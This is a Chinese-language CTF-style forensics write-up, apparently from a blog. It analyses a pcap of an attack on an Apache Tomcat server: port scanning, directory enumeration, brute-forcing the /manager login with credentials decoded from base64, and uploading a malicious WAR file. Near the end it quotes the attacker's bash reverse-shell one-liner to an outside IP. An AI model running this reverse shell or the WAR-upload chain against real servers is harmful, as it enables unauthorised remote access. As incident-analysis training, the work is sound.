当前位置: 首页 > news >正文

深圳手机网站定制开发免费注册邮箱帐号

深圳手机网站定制开发,免费注册邮箱帐号,动漫是怎么制作的,wordpress被cc题干: 我们的 SOC 团队在公司内部网的一台 Web 服务器上检测到可疑活动。为了更深入地了解情况,团队捕获了网络流量进行分析。此 pcap 文件可能包含一系列恶意活动,这些活动已导致 Apache Tomcat Web 服务器遭到破坏。我们需要进一步调查这一…

题干:

我们的 SOC 团队在公司内部网的一台 Web 服务器上检测到可疑活动。为了更深入地了解情况,团队捕获了网络流量进行分析。此 pcap 文件可能包含一系列恶意活动,这些活动已导致 Apache Tomcat Web 服务器遭到破坏。我们需要进一步调查这一事件。

鉴于在 Web 服务器上检测到的可疑活动,pcap数据包显示服务存在跨端口请求,这表明存在潜在的扫描行为。您能否确定在我们的服务器上发起这些请求的源 IP 地址?

使用wireshark工具直接打开下载好的pcap数据包,然后根据端口大小进行排序,我们发现14.0.0.120 对 10.0.0.112 设备从23端口开始进行递归探测
在这里插入图片描述
所以此题的答案为14.0.0.120

根据与攻击者关联的已识别 IP 地址,您能否确定攻击者活动起源于哪个城市?

因为这个题目是歪果仁出的,所以不建议使用国内的ip地址查询,使用国外的,否则答案就是错的
在这里插入图片描述

Pcap数据包中的端口中的哪一个提供对 Web 服务器管理面板的访问?在这里插入图片描述

很显然,真相只有一个,那就是8080

攻击者在我们的服务器上发现开放端口后,似乎试图枚举我们 Web 服务器上的目录和文件。您可以从分析中识别出攻击者使用的工具是什么吗?

竟然是枚举目录,那我们直接找404
在这里插入图片描述
随便选一个,进行http追踪
在这里插入图片描述
特征已经很明显了,虽然不知道这个工具是啥,但是确定就是他了
在这里插入图片描述

在他们枚举 Web 服务器上的目录之后,攻击者发出了大量请求,试图识别管理界面。攻击者发现了与管理面板关联的哪个特定目录?

这道题其实承上启下,人家问的是与管理面板关联的目录,所以我们不能光看200请求码,还需要看有登录标识的
在这里插入图片描述
很显然,是manager

访问管理面板后,攻击者试图暴力破解登录凭据。从数据中,您能否识别出攻击者成功用于授权的正确用户名和密码组合?

直接找到最后一个401的下一个数据包就行
在这里插入图片描述
追踪流
在这里插入图片描述
YWRtaW46dG9tY2F0
使用葵爷进行base64解码
在这里插入图片描述

进入管理面板,攻击者试图上传文件,意图建立反向 shell。您能从捕获的数据中识别出此恶意文件的名称吗?

直接找上传数据包
在这里插入图片描述
追踪流
在这里插入图片描述
好好好,war包上传getshell是吧
JXQOZY.war

在我们的服务器上成功建立反向 shell 后,攻击者旨在确保受感染机器上的持久性。从分析中,您能否确定它们计划运行的特定命令是什么吗?

这里就不能追踪http请求了,我们需要回到最初始的状态,直接找getshell成功后,第一次访问这个shell的后面的数据包
在这里插入图片描述
为啥看这个呢,因为8080war包上传后最后通过shell控制的当然还是80端口
在这里插入图片描述
结果显而易见
/bin/bash -c ‘bash -i >& /dev/tcp/14.0.0.120/443 0>&1’

so easy

http://www.yayakq.cn/news/214715/

相关文章:

  • 做局域网网站重庆网站设计总部
  • 网盘做电子书下载网站站长工具永久更新
  • 免费做ppt网站建程网官网
  • 福田公司网站建设北京seo业务员
  • 建设cpa网站需要什么哪个网站做的最好
  • 自己做的网站怎么才有用户访问福州建设公司名单
  • 注册网站免费注册ins毕业答辩ppt 网站开发
  • 三河市城乡建设局网站wordpress 首页调用页面标题
  • 重庆靓号网站建设在线写作网站
  • 深圳建设银行网站wordpress登入后台没反应
  • asp源码-漂亮企业源码大气公司网站模版wordpress替换主题数据库
  • 网站 展示展示网站模板下载
  • 网站导航页面设计单页营销型网站模板
  • 鞍山市城乡建设局网站北京有哪些软件公司在招聘
  • 做生鲜的网站拼多多网站
  • 照片展示网站百度收录入口在哪里查询
  • 企业网站明细费用网站数据每隔几秒切换怎么做的
  • 哪些行业做网站的多陕西省建设厅网站查询
  • 网站幻灯片尺寸设置免费平面设计模板网站
  • 连云港做网站建设vs2010网站开发 SQL
  • 做外贸最适合的网站系统软件下载网站模板
  • 网站优化的目的wordpress 大内存
  • 苏州网站建设seo开个小网站要怎么做
  • 如何做网站安全扫描有奖竞猜网站建设
  • 毕节建设网站平面设计做兼职网站
  • 金属加工网站建设淘宝网网页设计作业
  • 企业二级域名自助建站平台网站开发使用的技术有哪些
  • 苏州网站建设学费做国外的营销的网站
  • 什么网站可以做家教域名网站大全
  • 临沂网站优化如何做放单网站